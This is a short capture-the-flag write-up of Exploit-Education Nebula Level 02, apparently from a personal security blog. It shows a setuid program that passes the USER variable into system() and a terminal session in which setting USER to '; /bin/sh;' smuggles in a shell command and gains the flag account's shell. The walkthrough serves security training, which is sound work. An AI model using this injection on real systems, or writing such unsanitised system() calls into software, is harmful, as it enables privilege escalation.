Exploit-Education Nebula Level 02

less than 1 minute read

Exploit Education Level 2

Challenge

Challenge
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

Vulnerability

This program is similar to the last challenge.

asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);

We can see here that the command echo is copied into the buffer along with the environment variable USER if we replace the USER env variable with ;/bin/sh a shell will be executed after the echo command

Exploitation

The flag02 program has the set user id bit set

-rwsr-x--- 1 flag02 level02 7438 2011-11-20 21:22 flag02

Lets add ; /bin/sh; to the env variable and execute the program

level02@nebula:/home/flag02$ USER='; /bin/sh;'
level02@nebula:/home/flag02$ env | grep USER
USER=; /bin/sh;
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ; /bin/sh; is cool")
sh-4.2$ getflag
You have successfully executed getflag on a target account

Solved!

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.